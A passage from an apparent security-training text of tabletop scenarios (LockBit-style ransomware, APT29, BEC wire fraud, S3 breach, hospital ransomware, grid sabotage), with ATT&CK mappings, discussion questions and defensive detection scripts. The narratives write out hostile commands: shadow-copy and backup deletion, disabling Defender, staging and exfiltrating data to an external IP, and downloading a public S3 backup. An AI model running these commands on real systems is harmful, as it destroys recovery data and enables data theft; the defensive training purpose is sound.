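if __name__ == "__main__":
    print("kerberoast:", kerberoast_hits(SAMPLE_EVENTS))
    print("sweeps:", roasting_sweeps(SAMPLE_EVENTS))
    print("dcsync:", dcsync_hits(SAMPLE_EVENTS))
```

The single-ticket rule is noisy in estates that still have RC4-only service accounts, which is why `roasting_sweeps` counts distinct SPNs per requester: an attacker roasting pulls tickets for every SPN it can find, while a user's session touches one or two. The DCSync rule has the mirror problem: it needs an accurate DC list, and a DC that is missing from it will alert on every replication cycle.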
### Phase 4: Exfiltration (Days 5-6)
DAY 5-6:
─────────────────────────────────────────────────────────
Identify high-value data:
→ File share enumeration: find shares containing M&A, contracts, customer data
→ Target: \\fileserver\FinanceDocs\, \\fileserver\LegalContracts\
Data staging and exfiltration:
→ xcopy \\fileserver\FinanceDocs C:\Windows\Temp\stage\ /S
→ 7za.exe a -p"Archive2024!" -mx1 C:\Windows\Temp\data.7z C:\Windows\Temp\stage\
→ StealBit: HTTP POST to 185.220.x.x:8443 (TOR exit node)
→ Total: 47 GB exfiltrated over 6 hours
Confirm exfil success, notify group
Detection Opportunities:
- DLP: Large copy from file server to workstation
- Network: Large HTTPS upload to unknown external IP
- EDR: 7za.exe compression of large data volume
### Phase 5: Ransomware Deployment (Day 7)
DAY 7 — 03:00 AM (deliberate timing):
─────────────────────────────────────────────────────────
Pre-deployment cleanup:
→ vssadmin delete shadows /all /quiet (T1490)
→ bcdedit /set {default} recoveryenabled No
→ wbadmin delete catalog -quiet
→ net stop "Windows Defender Antivirus Service" (T1562.001)
→ sc disable WinDefend
Mass lateral movement (T1570):
→ PsExec deployed to 200+ hosts simultaneously via GPO (T1072)
→ ADMIN$ share used for distribution
Encryption begins:
→ LockBit locker binary runs on all hosts simultaneously
→ .lockbit3 extension added to all files
→ Ransom note !!-README-RESTORE-FILES-!!.txt in every directory
→ Complete encryption: ~45 minutes (2,300 endpoints)
→ Desktop wallpaper changed: "YOUR NETWORK HAS BEEN ENCRYPTED"
Evidence: Data leak site shows 47GB stolen
Ransom demand: $4.7M in Monero (0.1% of annual revenue)
Deadline: 72 hours
### Defender Discussion Points
- At which phase could detection have occurred?
- What controls, if operational, would have interrupted this chain?
- How do you respond when 2,300 endpoints are simultaneously encrypted?
- Do you pay? Who decides? What's the legal process?
- How do you communicate to 800 employees who can't access their computers?
- What does recovery look like? Timeline? Resources needed?
## SC-002: APT Espionage Campaign
### Scenario Overview
- Duration: 3-month simulated engagement
- Threat Actor: APT29 / Cozy Bear (Russian SVR)
- Target: Defense contractor with classified government contracts
- Objective: Steal proprietary technology / defense project plans
### Key TTPs
| Phase | Technique | ATT&CK ID |
|---|---|---|
| Initial Access | Spearphishing with COVID research lure | T1566.002 |
| Execution | Malicious macro in DOCM | T1204.002 |
| Persistence | Scheduled task disguised as system task | T1053.005 |
| Defense Evasion | WellMess C2 over HTTPS to OneDrive | T1567.002 |
| Discovery | SharePoint search for classified docs | T1213 |
| Collection | Automated ZIP archive of project folders | T1074 |
| Exfiltration | Staged via OneDrive "collaboration" account | T1567.002 |
| Lateral Movement | Pass-the-Ticket to email server | T1550.003 |
### Detection Challenges
APT29's unique OPSEC makes detection extremely difficult:
- Uses only legitimate cloud services as C2 (no custom domains)
- Blends into normal O365 activity
- Long dwell time (months) before objective
- No ransomware or destructive payload (purely espionage)
- Minimal lateral movement — targeted access to specific systems
### Discussion Questions
- How do you detect legitimate cloud service abuse as C2?
- What behavioral anomalies would distinguish APT29 from a legitimate user?
- How do you prove attribution — or does it matter for IR?
- What obligations exist for government contractor breach notification?
- How does this incident change your cloud and email security architecture?
## SC-003: Insider Threat — Departing Employee
### Scenario Overview
- Actor: Senior data scientist, recently passed over for promotion, received competing job offer
- Timeline: 6 weeks before departure (notice period)
- Data at Risk: ML model source code, customer dataset (2M records), API documentation
### Behavioral Timeline
WEEK 1: Job offer accepted
├── LinkedIn updated with "Open to Work" (HR notices via social monitoring)
├── Resignation submitted — works 2-week notice
└── Access not immediately revoked (IT ticket backlog)
WEEK 2-3: Active staging
├── UEBA alert: file access volume 8x baseline (Monday 11 PM - 2 AM)
├── DLP alert: 47 archives uploaded to personal Dropbox account
├── Email: Forwarded project documentation to personal Gmail
└── USB: 128GB drive inserted to workstation (logged by Sysmon)
WEEK 4-6: Post-departure exploitation
├── Forgot to revoke SaaS access: GitHub private repo still accessible
├── Used personal device (not managed) to clone company repos
└── Joined competitor: company IP appears in competitor product 6 months later
### Discussion Questions
- HR-to-security communication process — what triggered (or should have triggered) security monitoring?
- Legal constraints on monitoring a resigning employee vs. a regular employee
- At what point do you take forensic action? Confront? Involve legal?
- What did the organization's DLP, UEBA, and endpoint monitoring reveal?
- Evidence chain for potential civil/criminal action
## SC-004: Software Supply Chain Attack
Based loosely on SolarWinds methodology
### Attack Chain
STEP 1: Target identified
└── Attacker researches "target.com uses Orion-equivalent software" via LinkedIn/job posts
STEP 2: Vendor compromise
└── Phishing against DevOps engineer at software vendor
└── Credentials to build server obtained
STEP 3: Build system implant
└── SUNSPOT equivalent injected into CI/CD pipeline
└── Trojanized DLL compiled into next software update
STEP 4: Update distributed
└── 12,000 customers install update
└── Implant activates after 14-day delay
└── Reports environment fingerprint to C2
STEP 5: Target selection
└── High-value targets (government, defense, financial) receive stage 2
└── Others: implant remains dormant
STEP 6: Long-term espionage
└── Using legitimate cloud services as C2
└── 6-9 month dwell time before discovery
### Discussion Questions
- How do you detect malicious code in a trusted vendor update?
- What contractual and technical controls would have prevented this?
- SBOM (Software Bill of Materials) — how does it help? Is it sufficient?
- How do you communicate to customers that you were the attack vector?
- SLSA framework — would Level 3 have prevented this attack?
## SC-005: Business Email Compromise — Wire Fraud
- Duration: 3-week simulated campaign (or 2-hour tabletop)
- Threat Actor: West African cybercriminal group (BEC-specialized)
- Target: Mid-market manufacturing company ($200M revenue)
- Objective: Fraudulent wire transfer of $1.8M to attacker-controlled account
- Outcome (simulated): Transfer initiated; $1.2M recovered via FBI IC3 recall; $600K lost
### Attack Narrative
DAY 1 — RECONNAISSANCE
────────────────────────────────────────────────────────────────
Attacker harvests from LinkedIn and company website:
- CFO name: Sarah Mitchell (sarah.mitchell@target.com)
- CEO name: Robert Chen (robert.chen@target.com)
- External counsel: Baker & Greene LLP (listed in SEC filings)
- Ongoing M&A activity: press release reveals acquisition talks
DAY 3 — DOMAIN REGISTRATION
────────────────────────────────────────────────────────────────
Attacker registers: target-corp.com (lookalike — hyphen added)
Configures: robert.chen@target-corp.com
SPF record added to appear legitimate
No DMARC policy at target.com — no alignment check possible
DAY 5 — THREAD HIJACKING (AiTM variant)
────────────────────────────────────────────────────────────────
Phishing email to sarah.mitchell@target.com:
Subject: "Secure document review — acquisition NDA"
Link → Evilginx2 reverse proxy → Microsoft 365 login (real)
Victim authenticates → session cookie captured
Attacker logs into M365 as Sarah — MFA bypassed via session theft
Attacker reads last 30 days of CFO email threads
Key finding: pending $1.8M payment to vendor "Apex Solutions"
DAY 8 — BEC EXECUTION
────────────────────────────────────────────────────────────────
From: robert.chen@target-corp.com (spoofed CEO lookalike)
To: sarah.mitchell@target.com
Subject: Re: Apex Solutions payment — URGENT change
"Sarah, Apex has notified us of a bank account change effective today.
Please update the wire instructions for the $1.8M payment:
Bank: City National Bank
Account: 4471829037
Routing: 122016066
Reference: APX-2026-Q1-FINAL
This must go today — our counsel says delay triggers penalty clauses.
Do not discuss via phone — I am in board meetings all day. — Robert"
DAY 8 +4 HOURS:
────────────────────────────────────────────────────────────────
CFO initiates wire transfer per "CEO" instruction
Finance controller approves (second approver also deceived)
$1.8M transferred to attacker-controlled account
Attacker immediately moves $1.2M to crypto (Monero)
Remaining $600K sits in mule account
DAY 9 — DISCOVERY
────────────────────────────────────────────────────────────────
Real CEO asks about Apex payment status
CFO realizes CEO never sent the email
Incident declared — FBI IC3 contacted within 4 hours
Financial Institution Fraud Unit freezes $600K in mule account
$1.2M already converted — unrecoverable
### ATT&CK Mapping
| Phase | Technique | ID |
|---|---|---|
| Reconnaissance | Gather Victim Org Info | T1591 |
| Resource Development | Acquire Infrastructure: Domain | T1583.001 |
| Initial Access | Phishing: Spearphishing Link (AiTM) | T1566.002 |
| Credential Access | Steal Web Session Cookie | T1539 |
| Collection | Email Collection | T1114 |
| Impact | Transfer Financial Assets (BEC) | T1657 |
### Detection Opportunities
| Control | Would Have Caught | Cost |
|---|---|---|
| DMARC p=reject on target.com | Lookalike domain blocked at delivery | Low |
| Phishing-resistant MFA (FIDO2) | AiTM session theft fails | Medium |
| Conditional Access: token binding | Session cookie theft fails | Medium |
| Dual-approval + callback for wire changes | Transfer requires voice confirm | Low (policy) |
| Anti-phishing AI (Defender for O365 P2) | Lookalike domain flagged | Medium |
| UEBA: email access from new IP/ASN | Session hijack detected | Medium |
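Two of the table's controls are cheap enough to prototype in a few dozen lines, and doing so makes their scope clear. A DMARC policy governs mail that claims to come from a domain you own: an enforcing record on target.com stops direct spoofing of target.com, whereas the attacker's target-corp.com is a separate registration with its own valid SPF, so lookalike detection is a second, independent check. The Python below is an added example, not part of the scenario packet: it parses a DMARC TXT record and decides whether it is enforcing, and classifies a sender domain against a protected one by homoglyph folding, edit distance and brand-token matching. The sender domains are the ones the scenario uses plus constructed variants; the single-label public-suffix assumption and the homoglyph map are simplifications noted in the code.

```python
"""Lookalike-sender and DMARC policy checks.

Added example, not from the scenario packet. DMARC protects the exact
domain the record is published on; lookalike registrations (hyphen added,
digit-for-letter, one-character typo) need the separate classifier below.
"""
# Digit-for-letter substitutions common in lookalike registrations (assumed map)
HOMOGLYPHS = str.maketrans({"0": "o", "1": "l", "3": "e", "4": "a", "5": "s", "7": "t"})


def normalize_label(label):
    """Lowercase and fold look-alike characters so 'payr0ll' compares equal to 'payroll'."""
    return label.lower().translate(HOMOGLYPHS).replace("rn", "m").replace("vv", "w")


def registrable_label(domain):
    """Strip the public suffix. Assumes a single-label suffix (example.com);
    co.uk-style suffixes would need a public-suffix-list lookup."""
    return domain.lower().rstrip(".").rsplit(".", 1)[0]


def levenshtein(a, b):
    """Edit distance between two strings (insert, delete, substitute)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify_lookalike(sender_domain, protected_domain):
    """Return the kind of lookalike, or None if the sender does not resemble the protected domain."""
    s, p = registrable_label(sender_domain), registrable_label(protected_domain)
    if s == p:
        return None                      # same registrable domain; DMARC handles spoofing of it
    if normalize_label(s) == normalize_label(p):
        return "homoglyph"               # payr0ll-service vs payroll-service
    if levenshtein(normalize_label(s), normalize_label(p)) <= 1:
        return "typo"                    # tatget vs target
    if p in s.split("-"):
        return "brand-hyphen"            # target-corp vs target
    return None


def parse_dmarc(record):
    """Split a DMARC TXT record ('v=DMARC1; p=reject; ...') into a tag dict."""
    tags = {}
    for part in record.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            tags[key.strip().lower()] = value.strip()
    return tags


def dmarc_enforcing(record):
    """True only for a quarantine or reject policy applied to 100% of mail."""
    tags = parse_dmarc(record)
    if tags.get("v", "").upper() != "DMARC1":
        return False
    policy = tags.get("p", "none").lower()
    return policy in ("quarantine", "reject") and int(tags.get("pct", "100")) == 100


def screen_sender(from_domain, protected_domain, protected_dmarc_record):
    """Verdict a mail-flow rule could act on: lookalike class plus the protected domain's posture."""
    return {
        "lookalike": classify_lookalike(from_domain, protected_domain),
        "protected_domain_dmarc_enforcing": dmarc_enforcing(protected_dmarc_record),
    }


if __name__ == "__main__":
    # The scenario's own domains, plus constructed records for target.com
    print(screen_sender("target-corp.com", "target.com", "v=DMARC1; p=none; rua=mailto:dmarc@target.com"))
    print(screen_sender("payr0ll-service.com", "payroll-service.com", "v=DMARC1; p=reject"))
```

`p=quarantine` with `pct=10` is treated as not enforcing, because nine in ten spoofed messages would still be delivered; that partial-rollout state is common and worth surfacing in the tabletop when the team asserts "we have DMARC".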
### Discussion Questions
- DMARC was not configured — who in the org is responsible for email authentication?
- The CFO had MFA — how did AiTM bypass it? What authentication would have prevented it?
- At what point in the attack chain could a dual-approval policy have stopped the transfer?
- Regulatory obligations: SAR filing? Customer notification? What are the time limits?
- How do you structure the post-incident conversation with the CFO without creating blame?
## SC-006: Cloud Misconfiguration to Data Breach
- Duration: 2-week simulated breach (or 2-hour tabletop)
- Threat Actor: Opportunistic criminal; automated scanner
- Target: SaaS startup — AWS-hosted; 450K customers
- Initial Vector: Public S3 bucket discovered via automated scanning
- Outcome: 450K customer PII records exfiltrated; GDPR breach notification required
### Attack Narrative
```text
AUTOMATED DISCOVERY PHASE (no human involvement)
────────────────────────────────────────────────────────────────
GrayhatWarfare / S3Scanner bot scans for public S3 buckets:
  s3://startup-prod-backups/ — PUBLIC READ (misconfigured)
  Contents: nightly database backup files (.sql.gz)
  Largest file: backup-2026-03-01.sql.gz (4.2GB)
  No authentication required — direct download via HTTP
  $ aws s3 cp s3://startup-prod-backups/backup-2026-03-01.sql.gz . --no-sign-request

HUMAN ATTACKER TAKES OVER
────────────────────────────────────────────────────────────────
Download completes in 8 minutes (no rate limiting, no VPC endpoint)
Database contains:
  - 450,000 customer records (name, email, address, phone)
  - 12,000 records with partial payment card data (last4, exp)
  - Password hashes: bcrypt (most), MD5 (legacy users from 2019)
Attacker posts sample on hacker forum — offers full DB for $15,000
HaveIBeenPwned researcher notifies company 3 days after initial access
CloudTrail shows no alerts — S3 server access logging was disabled

DISCOVERY BY COMPANY
────────────────────────────────────────────────────────────────
Notification from HIBP researcher
Security team reviews CloudTrail:
  - GetObject API calls from 45.x.x.x (VPN exit, Netherlands)
  - No alert fired: S3 bucket was not in Macie scope
  - No GuardDuty finding: bucket listed as "internal backup" in tag
  - First access: 96 hours ago — dwell time exceeded detection window
```
GDPR Breach Response Timeline¶
```mermaid
gantt
    dateFormat YYYY-MM-DD HH:mm
    axisFormat %H:%M Day %j
    section Discovery
    HIBP notification received   :milestone, d1, 2026-03-05 09:00, 0m
    Incident declared            :d2, 2026-03-05 09:00, 2h
    section Assessment
    Scope confirmed (450K PII)   :d3, 2026-03-05 11:00, 4h
    Legal counsel engaged        :d4, 2026-03-05 12:00, 2h
    section Notification (GDPR: 72h limit)
    GDPR 72h deadline            :crit, milestone, d5, 2026-03-08 09:00, 0m
    DPA notification filed       :d6, 2026-03-07 18:00, 2h
    section Remediation
    S3 bucket made private       :d7, 2026-03-05 10:00, 1h
    Macie enabled on all buckets :d8, 2026-03-06 09:00, 4h
    Customer notification sent   :d9, 2026-03-10 09:00, 1h
```

Root Cause Analysis¶
| Finding | Root Cause | Fix |
|---|---|---|
| Public S3 bucket | IaC template missing block_public_access | Checkov gate + SCPs |
| S3 access logging disabled | Not in deployment checklist | Config rule: s3-bucket-logging-enabled |
| No Macie coverage | Only enabled on "sensitive" tagged buckets | Macie on all buckets |
| No GuardDuty finding | Anomaly baseline not tuned for off-hours large downloads | GuardDuty + sensitivity tuning |
| 96-hour detection gap | No real-time alerting on S3 public access | EventBridge → SNS on public bucket events |
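As an added example (not part of the scenario packet), an offline audit that checks a bucket's state against the root causes in the table above: incomplete Block Public Access, a public bucket policy, disabled access logging, and tag-based Macie scoping. The input dicts only mimic the shape of boto3 responses, and both sample buckets are constructed.

```python
"""Offline S3 exposure audit (added example for SC-006, not from the packet).
Input dicts mimic boto3 response shapes (get_public_access_block,
get_bucket_policy_status, get_bucket_logging, get_bucket_tagging); the two
sample buckets below are constructed for this exercise."""

PAB_FLAGS = ("BlockPublicAcls", "IgnorePublicAcls",
             "BlockPublicPolicy", "RestrictPublicBuckets")

# Constructed: a bucket shaped like the scenario's backup bucket, and a hardened twin.
SAMPLE_BUCKETS = {
    "startup-prod-backups": {
        "PublicAccessBlockConfiguration": None,         # IaC template never set it
        "PolicyStatus": {"IsPublic": True},             # public-read policy
        "LoggingEnabled": None,                         # server access logging off
        "Tags": {"Classification": "internal backup"},  # kept it out of Macie scope
    },
    "startup-prod-backups-hardened": {
        "PublicAccessBlockConfiguration": {f: True for f in PAB_FLAGS},
        "PolicyStatus": {"IsPublic": False},
        "LoggingEnabled": {"TargetBucket": "startup-s3-access-logs", "TargetPrefix": "prod-backups/"},
        "Tags": {"Classification": "sensitive"},
    },
}

def audit_bucket(state):
    """Return (finding, fix) pairs; an empty list means the bucket passes."""
    findings = []
    pab = state.get("PublicAccessBlockConfiguration") or {}
    missing = [f for f in PAB_FLAGS if not pab.get(f)]
    if missing:
        findings.append(("block_public_access incomplete: " + ", ".join(missing),
                         "set all four flags in IaC; enforce with an SCP"))
    if (state.get("PolicyStatus") or {}).get("IsPublic"):
        findings.append(("bucket policy grants public access",
                         "remove the public principal; RestrictPublicBuckets blocks it"))
    if not state.get("LoggingEnabled"):
        findings.append(("server access logging disabled",
                         "enable logging; Config rule s3-bucket-logging-enabled"))
    if (state.get("Tags") or {}).get("Classification") != "sensitive":
        findings.append(("outside Macie scope (tag-based enablement)",
                         "enable Macie on every bucket, not only tagged ones"))
    return findings

def audit_all(buckets):
    """Map bucket name -> findings, worst buckets first."""
    results = {name: audit_bucket(state) for name, state in buckets.items()}
    return dict(sorted(results.items(), key=lambda kv: -len(kv[1])))
```

Run against real state by feeding `audit_bucket` the corresponding boto3 responses merged into one dict per bucket.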
Discussion Questions¶
- S3 Block Public Access exists as an account-level control — why was it not enabled?
- At hour 8 of the incident, the CEO asks "can we not disclose?" — what is your response?
- Calculate the GDPR notification deadline; what happens if you miss it?
- How do you communicate to 450K customers? What do you tell them?
- PCI DSS implications for the partial card data — what additional reporting is required?
SC-007: Healthcare Ransomware — Patient Safety Impact¶
- Duration: Week-long simulated outbreak (or 3-hour tabletop)
- Threat Actor: ALPHV/BlackCat affiliate
- Target: Regional hospital network (12 facilities, 8,000 staff)
- Impact: Clinical systems offline 9 days; EHR encrypted; 3 patient safety incidents
Attack Narrative¶
```text
DAY -14: INITIAL ACCESS
────────────────────────────────────────────────────────────────
IAB (Initial Access Broker) sells RDP credentials:
  Target: \\DESKTOP-CITRIX01 (Citrix gateway — unpatched CVE-2019-19781)
  Credentials: svc-citrix-admin / Citrix2019!
  Price paid: $8,000 on underground forum
Affiliate purchases access, establishes Cobalt Strike beacon
Beacon communicates over HTTPS to categorized CDN domain
No EDR on Citrix server — legacy Windows Server 2012 R2

DAY -7 to -1: RECONNAISSANCE AND STAGING
────────────────────────────────────────────────────────────────
BloodHound reveals path to DA via misconfigured ADCS (ESC1)
ALPHV affiliate obtains Domain Admin in 4 hours
Identifies EHR system: Epic on 847 clinical workstations + 12 servers
Identifies PACS (radiology imaging): 23 TB on dedicated SAN
Identifies backup: Veeam on Windows VM (not offline/immutable)
Stages BlackCat encryptor on 200 systems via GPO

DAY 0: DETONATION — 03:47 AM (Sunday)
────────────────────────────────────────────────────────────────
BlackCat ransomware executes across network:
  - 847 EHR workstations encrypted (Epic offline)
  - 12 clinical servers encrypted
  - PACS imaging system encrypted (no backup — encrypted in-place)
  - Backup server encrypted
  - 2.1M patient records exfiltrated to BlackCat leak infrastructure
Staff arrive at 06:30 AM — all clinical systems display ransom note

PATIENT SAFETY INCIDENTS (Day 0-2):
────────────────────────────────────────────────────────────────
INCIDENT 1: ICU patient — medication dosing from memory;
            incorrect dose administered (minor injury)
INCIDENT 2: Lab results unavailable — delayed sepsis diagnosis
            Patient transferred, recovered
INCIDENT 3: Surgery scheduled without imaging — postponed 4 days
            Patient outcome not adversely affected

Ransom demand: $4.8M in Monero
Attacker: "Pay within 72 hours or patient data published"
OFAC check: ALPHV not (yet) on SDN list — payment legally permissible
HHS/OCR notified (HIPAA: within 60 days of discovery)
FBI engaged — decryption key available for cooperating victims
```
Crisis Decision Matrix¶
| Option | Pro | Con |
|---|---|---|
| Pay ransom | Fastest path to decryption keys | Funds criminal operations; no guarantee |
| Restore from backup | No ransom payment | Backups also encrypted; 2+ weeks to restore |
| FBI-assisted recovery | Free decryption (if key available) | FBI may not have ALPHV key; slow |
| Manual recovery + downtime procedures | Independent of attacker | 3-6 weeks; patient safety risk continues |
Discussion Questions¶
- At what point does ransomware in a hospital become a patient safety emergency? Who decides?
- The hospital board wants to pay the ransom immediately — as CISO, what is your advice?
- HIPAA breach: 2.1M records exfiltrated — notification timeline and scope?
- HHS has proposed a rule requiring cyber standards for hospitals — how does this incident support that?
- How do you run clinical operations for 9 days with no EHR? Describe the downtime procedures.
- Post-incident: three controls that would have prevented this entirely — prioritize by cost/impact.
SC-008: OT/ICS Sabotage — Power Grid Attack¶
- Duration: Long-form expert tabletop (4-6 hours) | NERC CIP compliance context
- Threat Actor: Nation-state (ELECTRUM/Sandworm-style — Russian GRU)
- Target: Regional electric utility (500MW generation facility)
- Objective: Destabilize grid operations during geopolitical crisis
- Reference: Based on CRASHOVERRIDE/Industroyer2 methodology (2016/2022 Ukraine)
Attack Narrative¶
```text
PHASE 1: IT NETWORK COMPROMISE (Months 1-3)
────────────────────────────────────────────────────────────────
Initial access: Spearphishing IT staff → credential capture
Lateral movement: IT network → historian servers in OT DMZ
Persistence: Custom implant on engineering workstation (EWS)
Discovery: Map OT network via Dragos-detectable passive scanning
Intelligence: ICS protocols in use: IEC 61850, IEC 104, Modbus

PHASE 2: OT NETWORK ACCESS (Months 3-5)
────────────────────────────────────────────────────────────────
Jump from IT DMZ to OT DMZ via historian server
Attacker installs custom ICS malware (CRASHOVERRIDE-equivalent):
  Module 1: IEC 61850 protocol module (breaker control)
  Module 2: IEC 104 module (SCADA communication)
  Module 3: Data wiper (post-attack cleanup)
  Module 4: Denial-of-service for Safety systems

PHASE 3: DISRUPTION EVENT (Coordinated with geopolitical event)
────────────────────────────────────────────────────────────────
T+00:00 — Malware issues OPEN commands to 17 transmission breakers
T+00:05 — 500MW drops from grid; 230,000 customers lose power
T+00:10 — Operators attempt manual restoration — HMI unresponsive (DoS)
T+00:15 — ICS wiper executes: overwrites EWS firmware
T+00:30 — Physical manual operations begin (breakers require on-site reset)
T+04:30 — Power restored to 85% of affected customers
T+09:00 — Full restoration; EWS requires hardware replacement

DISCOVERY AND ATTRIBUTION
────────────────────────────────────────────────────────────────
CISA Emergency Directive issued
ICS forensics team (Dragos/Mandiant) deployed
Malware samples match ELECTRUM toolset
Attribution: GRU Unit 74455 (Sandworm Team)
NERC CIP violation findings: CIP-005 (ESP), CIP-007 (patch management)
```
ICS-Specific Detection Opportunities¶
| Indicator | Detection Method | Tool |
|---|---|---|
| Abnormal protocol commands (OPEN to breakers) | Zeek ICS protocol analysis | Claroty / Dragos |
| EWS communicating with IT network | East-west ICS traffic baseline | Nozomi Networks |
| Historian server making unusual connections | OT DMZ firewall logs | Palo Alto NGFW |
| Passive scanning of ICS devices | Dragos Asset Identification | Dragos Platform |
| Protocol anomaly: IEC 61850 GOOSE spoofing | Signature detection | Claroty |
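As an added example (not from the packet or any vendor product), the first row of the table above as detection logic: a detector over IEC 104 control-command records that flags commands from a source other than the allowlisted SCADA master and a burst of OPEN commands across many distinct breakers, the Phase 3 pattern. The record layout, the master's address and the OFF-means-OPEN mapping are all assumptions constructed for the sample.

```python
"""IEC 104 breaker-command burst detector (added example for SC-008, not from
the packet or any vendor tool). Reads constructed control-command records in
a simplified Zeek-like layout and flags unauthorized masters and OPEN bursts."""
from collections import defaultdict
from datetime import datetime, timedelta

# IEC 60870-5-104 command type IDs: 45 = C_SC_NA_1 (single), 46 = C_DC_NA_1 (double).
# States: single 0=OFF/1=ON, double 1=OFF/2=ON. OFF == "breaker OPEN" is a site mapping assumed here.
OPEN_STATES = {45: {0}, 46: {1}}
ALLOWED_MASTERS = {"10.20.1.10"}      # constructed: the only legitimate SCADA master
WINDOW = timedelta(seconds=60)
BURST_THRESHOLD = 5                   # distinct breakers opened inside WINDOW

# Constructed records: ts src dst type_id cot ioa state   (cot 6 = activation)
SAMPLE_LOG = """\
2026-03-01T02:14:03Z 10.20.1.10 10.20.9.12 45 6 1001 1
2026-03-01T03:00:00Z 10.20.5.44 10.20.9.12 45 6 1001 0
2026-03-01T03:00:01Z 10.20.5.44 10.20.9.12 45 6 1002 0
2026-03-01T03:00:01Z 10.20.5.44 10.20.9.13 46 6 2001 1
2026-03-01T03:00:02Z 10.20.5.44 10.20.9.13 46 6 2002 1
2026-03-01T03:00:04Z 10.20.5.44 10.20.9.14 45 6 3001 0
"""

def parse(log):
    """Split whitespace-delimited records into dicts; a breaker is (outstation, IOA)."""
    recs = []
    for line in log.splitlines():
        ts, src, dst, tid, cot, ioa, state = line.split()
        recs.append({"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), "src": src,
                     "type": int(tid), "cot": int(cot), "breaker": (dst, int(ioa)),
                     "state": int(state)})
    return recs

def detect(recs):
    """Return ('unauthorized_master', src) once per source and
    ('breaker_open_burst', src, window_start, n_breakers) once per bursting source."""
    alerts, opens = [], defaultdict(list)
    for r in sorted(recs, key=lambda r: r["ts"]):
        if r["src"] not in ALLOWED_MASTERS and ("unauthorized_master", r["src"]) not in alerts:
            alerts.append(("unauthorized_master", r["src"]))
        if r["cot"] == 6 and r["state"] in OPEN_STATES.get(r["type"], ()):
            opens[r["src"]].append((r["ts"], r["breaker"]))
    for src, events in opens.items():      # sliding window over each source's OPEN commands
        for i, (t0, _) in enumerate(events):
            hit = {b for t, b in events[i:] if t - t0 <= WINDOW}
            if len(hit) >= BURST_THRESHOLD:
                alerts.append(("breaker_open_burst", src, t0, len(hit)))
                break                      # one alert per source is enough
    return alerts
```

Tune `BURST_THRESHOLD` and `WINDOW` against the site's own switching baseline before deploying; planned switching sequences can legitimately open several breakers in a short interval.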
NERC CIP Compliance Implications¶
| Standard | Requirement Violated | Penalty Range |
|---|---|---|
| CIP-005-6 | Electronic Security Perimeter insufficient | $1K–$1M/day |
| CIP-007-6 | Security patch management — EWS unpatched 18 months | $1K–$1M/day |
| CIP-008-6 | Incident response plan not exercised for ICS | $1K–$1M/day |
| CIP-010-3 | Configuration change management failures | $1K–$1M/day |
Discussion Questions¶
- The IT/OT boundary was crossed via the historian — what architectural control should have prevented this?
- NERC CIP requires incident reporting to E-ISAC — what is the timeline and scope?
- The wiper destroyed the EWS firmware — how do you recover from a hardware-level attack?
- Attribution to a nation-state — does the utility have any recourse? What does the US government do?
- Safety systems (SIS) were targeted by the DoS module — what is the IEC 62443 guidance for SIS independence?
- How do you test ICS defenses without disrupting live operations?
For tabletop exercise facilitation guides, see Labs → Lab 3: IR Simulation. For threat actor background, see Chapter 22: Threat Actor Encyclopedia. For AI security scenarios, see Chapter 37: AI Security and Chapter 11: LLM Guardrails.